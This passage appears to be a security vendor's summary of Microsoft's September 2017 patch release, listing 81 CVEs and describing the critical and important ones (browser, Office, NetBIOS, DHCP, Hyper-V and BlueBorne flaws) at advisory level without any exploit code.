CVEs: CVE-2017-0161, CVE-2017-11761, CVE-2017-11764, CVE-2017-11766, CVE-2017-8567, CVE-2017-8593, CVE-2017-8597, CVE-2017-8628, CVE-2017-8629, CVE-2017-8630, CVE-2017-8631, CVE-2017-8632, CVE-2017-8643, CVE-2017-8648, CVE-2017-8649, CVE-2017-8660, CVE-2017-8675, CVE-2017-8676, CVE-2017-8677, CVE-2017-8678, CVE-2017-8679, CVE-2017-8680, CVE-2017-8681, CVE-2017-8682, CVE-2017-8683, CVE-2017-8684, CVE-2017-8685, CVE-2017-8686, CVE-2017-8687, CVE-2017-8688, CVE-2017-8692, CVE-2017-8695, CVE-2017-8696, CVE-2017-8699, CVE-2017-8702, CVE-2017-8704, CVE-2017-8706, CVE-2017-8707, CVE-2017-8708, CVE-2017-8709, CVE-2017-8710, CVE-2017-8711, CVE-2017-8712, CVE-2017-8713, CVE-2017-8714, CVE-2017-8716, CVE-2017-8719, CVE-2017-8720, CVE-2017-8723, CVE-2017-8724, CVE-2017-8725, CVE-2017-8728, CVE-2017-8729, CVE-2017-8731, CVE-2017-8733, CVE-2017-8734, CVE-2017-8735, CVE-2017-8736, CVE-2017-8737, CVE-2017-8738, CVE-2017-8739, CVE-2017-8740, CVE-2017-8741, CVE-2017-8742, CVE-2017-8743, CVE-2017-8744, CVE-2017-8745, CVE-2017-8746, CVE-2017-8747, CVE-2017-8748, CVE-2017-8749, CVE-2017-8750, CVE-2017-8751, CVE-2017-8752, CVE-2017-8753, CVE-2017-8754, CVE-2017-8755, CVE-2017-8756, CVE-2017-8757, CVE-2017-8758, CVE-2017-8759, CVE-2017-9417

Description

Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 81 new vulnerabilities, with 27 of them rated critical, 52 rated important, and 2 rated moderate. These vulnerabilities impact Edge, Hyper-V, Internet Explorer, Office, Remote Desktop Protocol, SharePoint, Windows Graphic Display Interface, Windows Kernel Mode Drivers, and more. In addition, Microsoft is also releasing an update for Adobe Flash Player embedded in Edge and Internet Explorer.

Note that the Bluetooth vulnerabilities known as "BlueBorne" that affected Windows have been patched in this latest release. For more information, please refer to CVE-2017-8628.

## Vulnerabilities Rated Critical

The following vulnerabilities are rated "critical" by Microsoft:

* [CVE-2017-8747](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8747>) - Internet Explorer Memory Corruption Vulnerability
* [CVE-2017-8749](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8749>) - Internet Explorer Memory Corruption Vulnerability
* [CVE-2017-8750](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8750>) - Microsoft Browser Memory Corruption Vulnerability
* [CVE-2017-8731](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8731>) - Microsoft Edge Memory Corruption Vulnerability
* [CVE-2017-8734](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8734>) - Microsoft Edge Memory Corruption Vulnerability
* [CVE-2017-8751](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8751>) - Microsoft Edge Memory Corruption Vulnerability
* [CVE-2017-8755](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8755>) - Microsoft Edge Memory Corruption Vulnerability
* [CVE-2017-8756](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8756>) - Microsoft Edge Memory Corruption Vulnerability
* [CVE-2017-11766](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11766>) - Microsoft Edge Memory Corruption Vulnerability
* [CVE-2017-8757](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8757>) - Microsoft Edge Remote Code Execution Vulnerability
* [CVE-2017-8696](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8696>) - Microsoft Graphics Component Remote Code Execution
* [CVE-2017-8728](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8728>) - Microsoft PDF Remote Code Execution Vulnerability
* [CVE-2017-8737](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8737>) - Microsoft PDF Remote Code Execution Vulnerability
* [CVE-2017-0161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0161>) - NetBIOS Remote Code Execution Vulnerability
* [CVE-2017-8649](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8649>) - Scripting Engine Memory Corruption Vulnerability
* [CVE-2017-8660](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8660>) - Scripting Engine Memory Corruption Vulnerability
* [CVE-2017-8729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8729>) - Scripting Engine Memory Corruption Vulnerability
* [CVE-2017-8738](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8738>) - Scripting Engine Memory Corruption Vulnerability
* [CVE-2017-8740](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8740>) - Scripting Engine Memory Corruption Vulnerability
* [CVE-2017-8741](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8741>) - Scripting Engine Memory Corruption Vulnerability
* [CVE-2017-8748](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8748>) - Scripting Engine Memory Corruption Vulnerability
* [CVE-2017-8752](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8752>) - Scripting Engine Memory Corruption Vulnerability
* [CVE-2017-8753](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8753>) - Scripting Engine Memory Corruption Vulnerability
* [CVE-2017-11764](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11764>) - Scripting Engine Memory Corruption Vulnerability
* [CVE-2017-8682](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8682>) - Win32k Graphics Remote Code Execution Vulnerability
* [CVE-2017-8686](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8686>) - Windows DHCP Server Remote Code Execution Vulnerability
* [CVE-2017-8676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8676>) - Windows GDI+ Information Disclosure Vulnerability

The following briefly describes these vulnerabilities.

### CVE-2017-8747, CVE-2017-8749 - Internet Explorer Memory Corruption Vulnerability

Two vulnerabilities have been identified in Internet Explorer that could result in remote code execution in the context of the current user.
These vulnerabilities manifest due to improper handling of objects in memory when attempting to render a webpage. Both vulnerabilities could be exploited if, for example, a user visits a specially crafted webpage that triggers one of these flaws.

### CVE-2017-8750 - Microsoft Browser Memory Corruption Vulnerability

A vulnerability has been identified in Edge and Internet Explorer that could result in remote code execution in the context of the current user. This vulnerability manifests due to improper handling of objects in memory when attempting to render a webpage. It could be exploited if, for example, a user visits a specially crafted webpage that exploits this flaw.

### Multiple CVEs - Microsoft Edge Memory Corruption Vulnerability

Multiple vulnerabilities have been identified in Microsoft Edge that could allow an attacker to execute arbitrary code on an affected host. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation would result in arbitrary code execution in the context of the current user. Users who visit a specially crafted web page under the control of the attacker could be exploited.

The following is a list of CVEs that reflect these vulnerabilities:

* CVE-2017-8731
* CVE-2017-8734
* CVE-2017-8751
* CVE-2017-8755
* CVE-2017-8756
* CVE-2017-11766

### CVE-2017-8757 - Microsoft Edge Remote Code Execution Vulnerability

A vulnerability has been identified in Edge that could result in remote code execution in the context of the current user. This vulnerability manifests due to improper handling of objects in memory when attempting to render a webpage. It could be exploited if, for example, a user visits a specially crafted webpage that exploits this flaw.
Alternatively, an attacker could embed an ActiveX control marked "safe for initialization" within a Microsoft Office document that "hosts the browser rendering engine" and socially engineer the user into opening the malicious document.

### CVE-2017-8696 - Microsoft Graphics Component Remote Code Execution Vulnerability

A vulnerability has been identified in Windows Uniscribe that could allow an attacker to remotely execute arbitrary code on an affected host. This vulnerability manifests due to improper handling of objects in memory. Exploitation could be achieved if a user navigates to a malicious web page or opens a malicious file designed to exploit this vulnerability. Successful exploitation would result in arbitrary code execution in the context of the current user.

### CVE-2017-8728, CVE-2017-8737 - Microsoft PDF Remote Code Execution Vulnerability

Two vulnerabilities in the Microsoft Windows PDF library have been identified that could allow an attacker to execute arbitrary code on a targeted host. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation would result in arbitrary code execution in the context of the current user. Users who open a specially crafted PDF file, or who visit a web page containing a specially crafted PDF, could be affected by these vulnerabilities.

### CVE-2017-0161 - NetBIOS Remote Code Execution Vulnerability

A vulnerability in NetBT Session Services has been identified that could allow an attacker to remotely execute arbitrary code on the targeted host.
This vulnerability manifests as a race condition "when NetBT fails to maintain certain sequencing requirements." An attacker who sends specially crafted NetBT Session Service packets to the targeted system could exploit this vulnerability and achieve remote code execution.

### Multiple CVEs - Scripting Engine Memory Corruption Vulnerability

Multiple vulnerabilities have been identified in the Microsoft browser JavaScript engine that could allow remote code execution in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory, resulting in memory corruption. Exploitation is achievable if a user visits a specially crafted web page that contains JavaScript designed to exploit one or more of these vulnerabilities.

The following is a list of CVEs that reflect these vulnerabilities:

* CVE-2017-8649
* CVE-2017-8660
* CVE-2017-8729
* CVE-2017-8738
* CVE-2017-8740
* CVE-2017-8741
* CVE-2017-8748
* CVE-2017-8752
* CVE-2017-8753
* CVE-2017-11764

### CVE-2017-8682 - Win32k Graphics Remote Code Execution Vulnerability

A vulnerability in the Windows font library has been identified that could allow an attacker to execute arbitrary code on an affected host. This vulnerability manifests due to improper handling of embedded fonts. Successful exploitation would result in arbitrary code execution in the context of the current user.
For this vulnerability to be exploited, a user would need to either navigate to a specially crafted website or open a specially crafted document designed to exploit this flaw.

### CVE-2017-8686 - Windows DHCP Server Remote Code Execution Vulnerability

A vulnerability has been identified in the Windows Server DHCP service that could allow remote code execution if exploited. This vulnerability manifests as a result of the service incorrectly handling DHCP packets. Successful exploitation could allow an attacker to remotely execute code on an affected host or create a denial-of-service condition. For this vulnerability to be exploited, an attacker would need to send a specially crafted packet to a DHCP server that is set to failover mode. If the server is not set to failover mode, the attack will not succeed.

### CVE-2017-8676 - Windows GDI+ Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Windows Graphics Device Interface+ (GDI+) that could allow an attacker to obtain potentially sensitive information about the affected host. This vulnerability manifests due to the Windows GDI+ component improperly handling objects in memory.
An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.<br /><br /><h2 id=\"h.kw73svtlwob2\">Vulnerabilities Rated Important</h2><br />The following vulnerabilities are rated \"important\" by Microsoft:<br /><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759\">CVE-2017-8759</a> - .NET Framework Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-9417\">CVE-2017-9417</a> - Broadcom BCM43xx Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8746\">CVE-2017-8746</a> - Device Guard Security Feature Bypass Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8695\">CVE-2017-8695</a> - Graphics Component Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8704\">CVE-2017-8704</a> - Hyper-V Denial of Service Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8706\">CVE-2017-8706</a> - Hyper-V Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8707\">CVE-2017-8707</a> - Hyper-V Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8711\">CVE-2017-8711</a> - Hyper-V Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8712\">CVE-2017-8712</a> - Hyper-V Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8713\">CVE-2017-8713</a> - Hyper-V Information Disclosure Vulnerability</li><li><a 
href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8733\">CVE-2017-8733</a> - Internet Explorer Spoofing Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628\">CVE-2017-8628</a> - Microsoft Bluetooth Driver Spoofing Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8736\">CVE-2017-8736</a> - Microsoft Browser Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8597\">CVE-2017-8597</a> - Microsoft Edge Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8643\">CVE-2017-8643</a> - Microsoft Edge Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8648\">CVE-2017-8648</a> - Microsoft Edge Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8754\">CVE-2017-8754</a> - Microsoft Edge Security Feature Bypass Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8724\">CVE-2017-8724</a> - Microsoft Edge Spoofing Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8758\">CVE-2017-8758</a> - Microsoft Exchange Cross-Site Scripting Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11761\">CVE-2017-11761</a> - Microsoft Exchange Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8630\">CVE-2017-8630</a> - Microsoft Office Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8631\">CVE-2017-8631</a> - 
Microsoft Office Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8632\">CVE-2017-8632</a> - Microsoft Office Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8744\">CVE-2017-8744</a> - Microsoft Office Memory Corruption Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8725\">CVE-2017-8725</a> - Microsoft Office Publisher Remote Code Execution</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8567\">CVE-2017-8567</a> - Microsoft Office Remote Code Execution</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8745\">CVE-2017-8745</a> - Microsoft SharePoint Cross Site Scripting Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8629\">CVE-2017-8629</a> - Microsoft SharePoint XSS Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8742\">CVE-2017-8742</a> - PowerPoint Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8743\">CVE-2017-8743</a> - PowerPoint Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8714\">CVE-2017-8714</a> - Remote Desktop Virtual Host Remote Code Execution Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8739\">CVE-2017-8739</a> - Scripting Engine Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8692\">CVE-2017-8692</a> - Uniscribe Remote Code Execution Vulnerability</li><li><a 
href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8675\">CVE-2017-8675</a> - Win32k Elevation of Privilege Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8720\">CVE-2017-8720</a> - Win32k Elevation of Privilege Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8683\">CVE-2017-8683</a> - Win32k Graphics Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8677\">CVE-2017-8677</a> - Win32k Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8678\">CVE-2017-8678</a> - Win32k Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8680\">CVE-2017-8680</a> - Win32k Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8681\">CVE-2017-8681</a> - Win32k Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8687\">CVE-2017-8687</a> - Win32k Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8702\">CVE-2017-8702</a> - Windows Elevation of Privilege Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8684\">CVE-2017-8684</a> - Windows GDI+ Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8685\">CVE-2017-8685</a> - Windows GDI+ Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8688\">CVE-2017-8688</a> - Windows GDI+ Information Disclosure 
Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8710\">CVE-2017-8710</a> - Windows Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8679\">CVE-2017-8679</a> - Windows Kernel Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8708\">CVE-2017-8708</a> - Windows Kernel Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8709\">CVE-2017-8709</a> - Windows Kernel Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8719\">CVE-2017-8719</a> - Windows Kernel Information Disclosure Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8716\">CVE-2017-8716</a> - Windows Security Feature Bypass Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8699\">CVE-2017-8699</a> - Windows Shell Remote Code Execution Vulnerability</li></ul><br /><br />The following briefly describes these vulnerabilities.<br /><br /><h3 id=\"h.yx03slsn57ac\">CVE-2017-8759 - .NET Framework Remote Code Execution Vulnerability</h3><br />A vulnerability has been identified in the Microsoft .NET Framework that could allow an attacker to execute arbitrary code on an affected device. This vulnerability manifests due to the framework improperly handling untrusted input. Successful exploitation could result in an attacker being able to execute arbitrary code in the context of the current user. A user who opens a malicious document or application could be exploited and compromised via this vulnerability.
<br /><br /><h3 id=\"h.uzavzney52sl\">CVE-2017-9417 - Broadcom BCM43xx Remote Code Execution Vulnerability</h3><br />A vulnerability has been identified in the Broadcom chipsets used in HoloLens that could allow an attacker to execute arbitrary code on an affected device. This vulnerability manifests due to improper handling of Wi-Fi packets. Successful exploitation of this vulnerability could result in an attacker being able to take full control of the device with administrator privileges.<br /><br /><h3 id=\"h.q0sownl8t7qr\">CVE-2017-8746 - Device Guard Security Feature Bypass Vulnerability</h3><br />A vulnerability has been identified in Device Guard that could allow an attacker to bypass a security control and inject malicious code into a Windows PowerShell session. This vulnerability manifests as a flaw in how the Device Guard Code Integrity policy is implemented. An attacker who has access to the local machine could inject malicious code into a script that is trusted by the Code Integrity policy. As a result, the injected code could run with the same trust level as the script, bypassing the Code Integrity policy control.<br /><br /><h3 id=\"h.ll3quw96ab85\">CVE-2017-8695 - Graphics Component Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified in Windows Uniscribe that could allow an attacker to obtain important system information. This information could then be used to further compromise a user's system via another vulnerability. Exploitation of this vulnerability could be achieved if a user opens a specially crafted document or visits a malicious web page that is designed to exploit this vulnerability.<br /><br /><h3 id=\"h.2bzhnugg695o\">CVE-2017-8704 - Hyper-V Denial of Service Vulnerability</h3><br />A denial of service vulnerability has been identified in Microsoft Hyper-V that could cause the host machine to crash.
This vulnerability manifests due to the host server improperly validating input from a privileged user within a guest operating system. An attacker who has privileged access in a guest operating system on the affected host could trigger this vulnerability by running a specially crafted application.<br /><br /><h3 id=\"h.r4ggol7u66a4\">Multiple CVEs - Hyper-V Information Disclosure Vulnerability</h3><br />Multiple information disclosure vulnerabilities have been identified in Windows Hyper-V that could allow an attacker to access sensitive information on the Hyper-V host operating system. These vulnerabilities manifest due to Hyper-V improperly validating input from an authenticated user inside a guest operating system. An attacker who has access to a guest VM and executes a specially crafted application within the guest VM could exploit these vulnerabilities and obtain information on the Hyper-V host.<br /><br />The following is a list of CVEs that reflect these vulnerabilities:<br /><ul><li>CVE-2017-8706</li><li>CVE-2017-8707</li><li>CVE-2017-8711</li><li>CVE-2017-8712</li><li>CVE-2017-8713</li></ul><h3 id=\"h.go05wxr3gp4u\">CVE-2017-8733 - Internet Explorer Spoofing Vulnerability</h3><br />A spoofing vulnerability in Internet Explorer has been identified that could allow an attacker to trick the user into believing they were visiting a legitimate web site. This vulnerability manifests due to Internet Explorer incorrectly handling specific HTML content. A user who navigates to a specially crafted web page under the control of the attacker could be exploited.
As a result, this malicious website could then be used to serve spoofed content to the user or to serve as part of an exploit chain designed to compromise the affected host.<br /><br /><h3 id=\"h.34qo8abuqnpm\">CVE-2017-8628 - Microsoft Bluetooth Driver Spoofing Vulnerability</h3><br />A spoofing vulnerability has been identified in Microsoft's implementation of the Bluetooth stack and has been disclosed as part of the \"BlueBorne\" series of vulnerabilities. This vulnerability could allow an attacker to perform a man-in-the-middle attack and force a user's device to \"unknowingly route traffic through the attacker's computer.\" For this exploit to be possible, an attacker would need to be in physical proximity to the targeted device and the targeted device would need to have Bluetooth enabled. Note that if both of these conditions are satisfied, an attacker could \"initiate a Bluetooth connection to the target computer without the user's knowledge.\"<br /><br /><h3 id=\"h.ln4j5mfzpuxf\">CVE-2017-8736 - Microsoft Browser Information Disclosure Vulnerability</h3><br />A vulnerability in Microsoft Edge and Internet Explorer has been identified that could allow an attacker to obtain information regarding the user's current session. This vulnerability manifests due to the browser improperly verifying parent domains in certain functionality. An attacker who socially engineers a user into visiting a specially crafted web page could exploit this flaw and obtain information that is specific to the parent domain.<br /><br /><h3 id=\"h.oviarhz23nwn\">CVE-2017-8597, CVE-2017-8648 - Microsoft Edge Information Disclosure Vulnerability</h3><br />Multiple vulnerabilities in Microsoft Edge have been identified that could allow an attacker to discover sensitive information regarding the targeted system. These vulnerabilities manifest due to improper handling of objects in memory.
Successful exploitation of these vulnerabilities could give an attacker the information needed to exploit additional vulnerabilities on the system.<br /><br /><h3 id=\"h.191qetibk7vs\">CVE-2017-8643 - Microsoft Edge Information Disclosure Vulnerability</h3><br />A vulnerability in Microsoft Edge has been identified that could permit the disclosure of potentially sensitive information. This vulnerability manifests due to Microsoft Edge improperly handling clipboard events. Exploitation of this vulnerability is achievable if an attacker socially engineers a user into opening a specially crafted web page that exploits this flaw. As long as this web page remains open, the attacker would be able to observe clipboard activity.<br /><br /><h3 id=\"h.pwpku8fvq7t4\">CVE-2017-8754 - Microsoft Edge Security Feature Bypass Vulnerability</h3><br />A vulnerability in Microsoft Edge has been identified that could allow an attacker to bypass the Content Security Policy (CSP) feature. This vulnerability manifests due to Edge improperly validating certain specially crafted documents. Successful exploitation could allow an attacker to redirect users to a malicious web page. Users who visit a specially crafted web page under the control of the attacker could be exploited. Alternatively, users who visit a compromised web page or who are served a malicious advertisement that an attacker has injected into an advertising network could be exploited.<br /><br /><h3 id=\"h.bogzmmli42pp\">CVE-2017-8724 - Microsoft Edge Spoofing Vulnerability</h3><br />A vulnerability in Edge has been identified that could allow an attacker to spoof content on a targeted host. This vulnerability manifests due to improper parsing of HTTP content. Successful exploitation of this vulnerability would result in the user being redirected to a web site of the attacker's choosing.
This web site could then spoof content or serve as part of an exploit chain whereby the user could be exploited via another vulnerability. Scenarios where a user could be attacked include email or instant message vectors where the user clicks on a malicious link, or the user navigates to a specially crafted web page under the control of the attacker.<br /><br /><h3 id=\"h.g6dm6snlerd4\">CVE-2017-8758 - Microsoft Exchange Cross-Site Scripting Vulnerability</h3><br />A cross-site scripting vulnerability in Microsoft Exchange has been identified that could allow an attacker to perform a content/script injection attack. This vulnerability manifests due to Exchange failing to properly handle web requests. An attacker who sends an intended victim a specially crafted email containing a malicious link could exploit this vulnerability and potentially trick the user into disclosing sensitive information.<br /><br /><h3 id=\"h.pg5opjwskjeq\">CVE-2017-11761 - Microsoft Exchange Information Disclosure Vulnerability</h3><br />A vulnerability in Microsoft Exchange has been identified that could allow an attacker to obtain information regarding the affected server's local network. This vulnerability manifests as an information disclosure flaw due to improper input sanitization. An attacker who includes specially crafted tags in a Calendar-related message and sends this to an affected Exchange server could exploit this flaw and enumerate internal hosts assigned an RFC 1918 IP address. This information could then be used as part of a larger attack.<br /><br /><h3 id=\"h.viucs2kai67d\">Multiple CVEs - Microsoft Office Memory Corruption Vulnerability</h3><br />Multiple vulnerabilities have been identified affecting Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. These vulnerabilities manifest due to Office improperly handling objects in memory. 
A user who opens a maliciously crafted Office document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document.<br /><br />The following is a list of CVEs that reflect these vulnerabilities:<br /><ul><li>CVE-2017-8630</li><li>CVE-2017-8631</li><li>CVE-2017-8632</li><li>CVE-2017-8744</li></ul><h3 id=\"h.nuqj6pjdzqbu\">CVE-2017-8725 - Microsoft Office Publisher Remote Code Execution</h3><br />A vulnerability has been identified affecting Microsoft Office Publisher that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Publisher improperly handling objects in memory. A user who opens a maliciously crafted Publisher document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Publisher document.<br /><br /><h3 id=\"h.esin5ce3nqec\">CVE-2017-8567 - Microsoft Office Remote Code Execution</h3><br />A vulnerability has been identified affecting Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Office improperly handling objects in memory. A user who opens a maliciously crafted document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user.
Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document. Note that the Preview Pane is not an attack vector for this vulnerability.<br /><br /><h3 id=\"h.ospgiqaad31r\">CVE-2017-8745, CVE-2017-8629 - Microsoft SharePoint XSS Vulnerability</h3><br />Two vulnerabilities in Microsoft SharePoint have been identified that could allow an attacker to execute a cross-site scripting (XSS) attack. These vulnerabilities manifest due to SharePoint Server improperly sanitizing specific web requests from a user. Successful exploitation of these flaws could allow an attacker to execute script in the context of the current user, read content that the attacker would not otherwise have permission to view, or execute actions on behalf of the affected user.<br /><br /><h3 id=\"h.635w9ipli4p\">CVE-2017-8742, CVE-2017-8743 - PowerPoint Remote Code Execution Vulnerability</h3><br />Two vulnerabilities have been identified affecting Microsoft Office PowerPoint that could allow an attacker to execute arbitrary code on an affected system. These vulnerabilities manifest due to PowerPoint improperly handling objects in memory. A user who opens a maliciously crafted PowerPoint document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious PowerPoint document.<br /><br /><h3 id=\"h.o485gj9i5m2w\">CVE-2017-8714 - Remote Desktop Virtual Host Remote Code Execution Vulnerability</h3><br />A vulnerability has been identified in the VM Host Agent Service of Remote Desktop Virtual Host that could allow an attacker to execute arbitrary code on an affected host.
